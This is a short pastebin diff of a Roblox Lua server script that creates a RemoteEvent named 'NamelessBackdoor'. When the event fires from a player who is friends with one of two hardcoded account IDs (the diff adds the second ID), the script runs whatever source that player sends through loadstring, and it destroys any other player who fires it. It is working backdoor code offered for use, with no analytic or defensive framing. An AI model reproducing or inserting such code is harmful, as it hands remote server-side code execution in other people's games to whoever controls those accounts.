SHOW:
|
|
- or go back to the newest paste.
1 | local ReplicatedStorage = game:GetService("ReplicatedStorage") | |
2 | ||
3 | local Backdoor = Instance.new("RemoteEvent") | |
4 | Backdoor.Name = "NamelessBackdoor" | |
5 | Backdoor.Parent = ReplicatedStorage | |
6 | ||
7 | Backdoor.OnServerEvent:Connect(function(Player, Src) | |
8 | - | if not Player:IsFriendsWith(2249250936) then Player:Destroy() end |
8 | + | if not (Player:IsFriendsWith(2249250936) or Player:IsFriendsWith(131084082)) then Player:Destroy() end |
9 | ||
10 | loadstring(Src)(Player) | |
11 | end) |